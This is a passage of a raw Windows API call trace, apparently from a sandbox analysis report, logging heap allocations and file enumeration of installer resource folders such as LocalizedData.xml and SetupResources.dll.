Size=0x5a) returned 0x717c0 [0060.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0060.661] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.661] GetFileType (hFile=0x420) returned 0x1 [0060.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.661] CloseHandle (hObject=0x420) returned 1 [0060.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.661] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.661] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.662] AreFileApisANSI () returned 1 [0060.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71620 [0060.662] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml") returned 45 [0060.662] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1032\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c)) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.662] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.662] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.662] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.662] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.662] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.663] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.663] AreFileApisANSI () returned 1 [0060.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.663] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.663] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0060.664] AreFileApisANSI () returned 1 [0060.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.664] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0060.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0060.664] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.664] GetFileType (hFile=0x420) returned 0x1 [0060.664] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.664] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.664] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.664] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.665] CloseHandle (hObject=0x420) returned 1 [0060.665] AreFileApisANSI () returned 1 [0060.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0060.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0060.665] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.665] GetFileType (hFile=0x420) returned 0x1 [0060.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.665] CloseHandle (hObject=0x420) returned 1 [0060.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.665] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.665] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.666] AreFileApisANSI () returned 1 [0060.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.666] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0060.666] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1032\\SetupResources.dll") returned 46 [0060.666] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1032\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58)) returned 1 [0060.666] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.667] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x45f00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䭘")) returned 0 [0060.667] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.667] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.667] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.667] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.668] AreFileApisANSI () returned 1 [0060.668] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1033", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1033", lpUsedDefaultChar=0x0) returned 27 [0060.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0060.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.668] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0060.668] AreFileApisANSI () returned 1 [0060.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.668] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033") returned 27 [0060.668] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033" (normalized: "c:\\588bce7c90097ed212\\1033"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.668] GetLastError () returned 0x5 [0060.668] GetLastError () returned 0x5 [0060.668] SetLastError (dwErrCode=0x5) [0060.668] GetLastError () returned 0x5 [0060.668] SetLastError (dwErrCode=0x5) [0060.668] GetLastError () returned 0x5 [0060.668] SetLastError (dwErrCode=0x5) [0060.668] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.668] AreFileApisANSI () returned 1 [0060.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.669] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033") returned 27 [0060.669] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033" (normalized: "c:\\588bce7c90097ed212\\1033"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.669] GetLastError () returned 0x5 [0060.669] GetLastError () returned 0x5 [0060.669] SetLastError (dwErrCode=0x5) [0060.669] GetLastError () returned 0x5 [0060.669] SetLastError (dwErrCode=0x5) [0060.669] GetLastError () returned 0x5 [0060.669] SetLastError (dwErrCode=0x5) [0060.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.669] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0060.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.669] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 